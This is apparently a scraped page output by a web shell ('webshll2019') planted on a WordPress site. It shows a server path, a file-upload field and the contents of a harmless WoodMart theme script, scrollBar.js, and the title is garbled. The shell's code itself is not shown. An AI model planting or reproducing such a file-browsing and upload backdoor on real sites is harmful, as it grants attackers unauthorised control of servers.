?

áEÓê¤ÎïLwebshll2019

Current Path : /home/webyoo/www/sarah/site/wp-content/themes/woodmart/js/scripts/global/
Upload File :
Current File : /home/webyoo/www/sarah/site/wp-content/themes/woodmart/js/scripts/global/scrollBar.js

/* global woodmart_settings */

(function($) {
	woodmartThemeModule.siteScroll = function() {
		if ( window.innerWidth > woodmartThemeModule.windowWidth ) {
			$('html').addClass('wd-scrollbar');
		}
	};

	$(document).ready(function() {
		woodmartThemeModule.siteScroll();
	});
})(jQuery);



web shell, Coded By 2019